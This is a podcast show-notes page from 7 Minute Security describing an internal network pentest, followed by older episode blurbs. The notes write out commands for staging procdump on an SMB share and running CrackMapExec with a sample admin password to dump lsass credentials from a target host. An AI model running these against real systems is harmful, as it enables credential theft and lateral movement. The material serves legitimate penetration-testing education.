7MS #383: Tales of Internal Network Pentest Pwnage - Part 10
7 Minute Security1 Okt 2019

7MS #383: Tales of Internal Network Pentest Pwnage - Part 10

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

  • Relayed one high-priv cred from one box to another
  • Dumped and cracked a local machine's hash
  • Passed that hash around the network
  • Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
  • Set the wdigest flag via CrackMapExec

Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share

Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)

Episoder(685)

7MS #69: I’m Not Responsible for Your Information Insecurity (audio)

7MS #69: I’m Not Responsible for Your Information Insecurity (audio)

Are you too hard on yourself? Do you think the success of your client’s infosec program lives and dies with you? Listen to this episode. You might feel better. 7MS #69: I’m Not Responsible for Your Information Insecurity (audio)

16 Jun 20158min

7MS #68: Is Training and Awareness Worth It or Worthless (audio)

7MS #68: Is Training and Awareness Worth It or Worthless (audio)

This episode is about something that got my undies in a bunch – I heard a security expert imply that training and awareness might be worthless! 7MS #68: Is Training and Awareness Worth It or Worthless (audio)

11 Jun 20158min

7MS #67: Wifi Sniffing is Fun-Part 2 (audio)

7MS #67: Wifi Sniffing is Fun-Part 2 (audio)

This is a follow-up to episode #64, in which I did some fun wireless sniffing and tried to find sensitive data within it! In the episode I talk about the network “map” of my sniffing setup. It looks like this: Ethernet from client->upstream port of hub My laptop with Wireshark->Hub Wifi access point->Hub To find…

9 Jun 20157min

7MS #66: I’m Excited to Go Phishing – Part 2 (audio)

7MS #66: I’m Excited to Go Phishing – Part 2 (audio)

This is a follow-up to episode #63, discussing the results of a fun phishing campaign I recently completed. 7MS #66: I’m Excited to Go Phishing – Part 2 (audio)

4 Jun 20158min

7MS #65: OFFTOPIC-Still Alice (audio)

7MS #65: OFFTOPIC-Still Alice (audio)

Warning, this episode is off topic and has NOTHING to do with infosec! Nope! Instead, it’s a review of the movie Still Alice. Yep. That happened. 7MS #65: OFFTOPIC-Still Alice (audio)

3 Jun 20157min

7MS #64: Wifi Sniffing is Fun-Part 1 (audio)

7MS #64: Wifi Sniffing is Fun-Part 1 (audio)

I got a fun project involving wireless sniffing, followed up by scraping through packets looking for credit card data! Here’s part 1, which talks about about software/hardware you might need to do this the right way. 7MS #64: Wifi Sniffing is Fun-Part 1 (audio)

28 Mai 20157min

7MS #63: I’m Excited to Go Phishing (audio)

7MS #63: I’m Excited to Go Phishing (audio)

This week I’ll be launching a phishing campaign against an organization that has been well trained to defend against such malicious attacks and links! Will this organization break my company’s 100% success rate for phishing, or will I be able to craft an email to fool at least one person? 7MS #63: I’m Excited to…

21 Mai 20157min

7MS #62: You Should Run LAPS (audio)

7MS #62: You Should Run LAPS (audio)

I’m excited about this! Microsoft has released a tool called Local Administrator Password Solution to help administrators manage local admin credentials for domain-joined machines. Check out this article for more information, and please contact me if you end up running this, as I’d love to hear about your experience. 7MS #62: You Should Run LAPS…

19 Mai 20157min

Populært innen Politikk og nyheter

giver-og-gjengen-vg
aftenpodden
aftenpodden-usa
forklart
stopp-verden
popradet
dine-penger-pengeradet
det-store-bildet
unitedno
nokon-ma-ga
fotballpodden-2
aftenbla-bla
rss-ness
rss-penger-polser-og-politikk
e24-podden
rss-fredrik-og-zahid-loser-ingenting
oppdatert
bt-dokumentar-2
rss-garne-damer
liverpoolno-pausepraten